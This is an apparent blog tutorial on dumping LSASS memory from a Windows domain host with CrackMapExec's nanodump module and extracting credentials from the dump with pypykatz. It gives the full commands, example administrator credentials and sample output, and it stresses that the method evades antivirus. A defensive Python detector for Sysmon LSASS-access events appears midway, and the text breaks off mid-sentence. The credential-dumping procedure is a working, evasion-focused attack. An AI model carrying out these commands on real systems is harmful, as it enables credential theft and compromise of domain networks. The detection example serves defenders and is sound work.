In this article, we will show you how to use CME's nanodump module, a lightweight and stealthy way to dump LSASS memory. NanoDump uses direct system calls and avoids writing any files to disk, which makes it harder for antivirus and endpoint protection software to detect.
Prerequisites
To follow this tutorial, you will need:
A Linux machine with CME installed. You can install CME from the official GitHub repository or use the Kali Linux package.
A Windows domain controller with an Active Directory domain. We will use ms.evilcorp.org as an example.
A domain user account with administrative privileges on the domain controller. We will use Administrator@ms.evilcorp.org with password poplab!sec as an example.
A target Windows host that is part of the domain and has SMB enabled. We will use 192.168.1.15 as an example.
Dumping LSASS Memory with NanoDump
To dump LSASS memory with NanoDump, we need to use CME's SMB protocol module and specify the --nanodump option along with the domain user credentials. For example:
crackmapexec smb 192.168.1.15 -u 'Administrator' -p 'poplab!sec' --nanodump
This command connects to the target host over SMB, injects NanoDump into memory using reflective DLL injection, dumps LSASS memory using direct system calls, and sends the dump back to CME over SMB.
The output of the command will look something like this:
SMB 192.168.1.15 445 WIN-PC [*] Windows 10 Pro 19042 x64 (name:WIN-PC) (domain:ms.evilcorp.org) (signing:True) (SMBv1:False)
SMB 192.168.1.15 445 WIN-PC [+] ms.evilcorp.org\Administrator:poplab!sec (Pwn3d!)
SMB 192.168.1.15 445 WIN-PC [+] Dumping lsass remotely using nanodump
SMB 192.168.1.15 445 WIN-PC [+] Lsass dump stored at /root/.cme/logs/nanodump/192.168.1.15_nanodump.dmp
The dumped LSASS memory file will be stored in the /root/.cme/logs/nanodump/ directory on the Linux machine.
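From the defender's side, NanoDump's direct system calls sidestep user-mode API hooks, but the handle it must open on lsass.exe with read access is still visible to a kernel-level sensor such as Sysmon Event ID 10 (ProcessAccess). The following Python is an added example, not code from this article, CME or NanoDump: it parses constructed Sysmon-style ProcessAccess records and flags any non-allowlisted process that obtains PROCESS_VM_READ on lsass.exe. The sample events and the allowlisted sensor path are made up for the demonstration.

```python
import re

# PROCESS_VM_READ must be present in the granted mask to read LSASS memory,
# whether the reader uses MiniDumpWriteDump or its own direct syscalls.
PROCESS_VM_READ = 0x0010

# Constructed Sysmon Event ID 10 (ProcessAccess) records, one key=value line
# each. Field names follow Sysmon's schema; paths and values are made up.
SAMPLE_EVENTS = [
    "EventID=10 SourceImage=C:\\Windows\\System32\\svchost.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1000",
    "EventID=10 SourceImage=C:\\Windows\\Temp\\update.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1010",
    "EventID=10 SourceImage=C:\\Program Files\\ExampleEDR\\sensor.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1fffff",
    "EventID=10 SourceImage=C:\\Windows\\System32\\rundll32.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1fffff",
    "EventID=10 SourceImage=C:\\Windows\\System32\\taskmgr.exe TargetImage=C:\\Windows\\System32\\notepad.exe GrantedAccess=0x1fffff",
    "EventID=1 Image=C:\\Windows\\System32\\cmd.exe CommandLine=cmd.exe",
]

# Hypothetical allowlist of images that legitimately read LSASS (e.g. an EDR
# sensor). Tune this to what is actually observed in your environment.
ALLOWLIST = {"C:\\Program Files\\ExampleEDR\\sensor.exe"}


def parse_event(line):
    """Split a flattened 'Key=value Key=value' record into a dict.
    Values may contain spaces, so a value ends only where the next Key= begins."""
    return dict(re.findall(r"(\w+)=(.*?)(?=\s\w+=|$)", line))


def detect_lsass_access(lines, allowlist):
    """Return (SourceImage, GrantedAccess) for each ProcessAccess event where a
    non-allowlisted process obtained PROCESS_VM_READ on lsass.exe."""
    allowed = {p.lower() for p in allowlist}
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "10":
            continue  # only ProcessAccess events carry GrantedAccess
        if not ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
            continue
        granted = int(ev.get("GrantedAccess", "0"), 16)
        if not granted & PROCESS_VM_READ:
            continue  # handle cannot read memory, e.g. query-only access
        src = ev.get("SourceImage", "")
        if src.lower() in allowed:
            continue
        alerts.append((src, hex(granted)))
    return alerts


if __name__ == "__main__":
    for src, mask in detect_lsass_access(SAMPLE_EVENTS, ALLOWLIST):
        print(f"ALERT: {src} opened lsass.exe with {mask}")
```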
Extracting Credentials from LSASS Memory Dump
To extract credentials from the LSASS memory dump, we can use tools like Mimikatz or Pypykatz. In this tutorial, we will use Pypykatz, which is a Python implementation of Mimikatz that can parse LSASS dumps offline.
To install Pypykatz, we can use pip:
pip install pypykatz
To parse the LSASS dump file, we can use the pypykatz lsa minidump command and specify the file path:
pypykatz lsa minidump /root/.cme/logs/nanodump/192.168.1.15_nanodump.dmp
This command outputs the credentials found in the LSASS dump, such as usernames, passwords, hashes and tickets.
The output of the command will look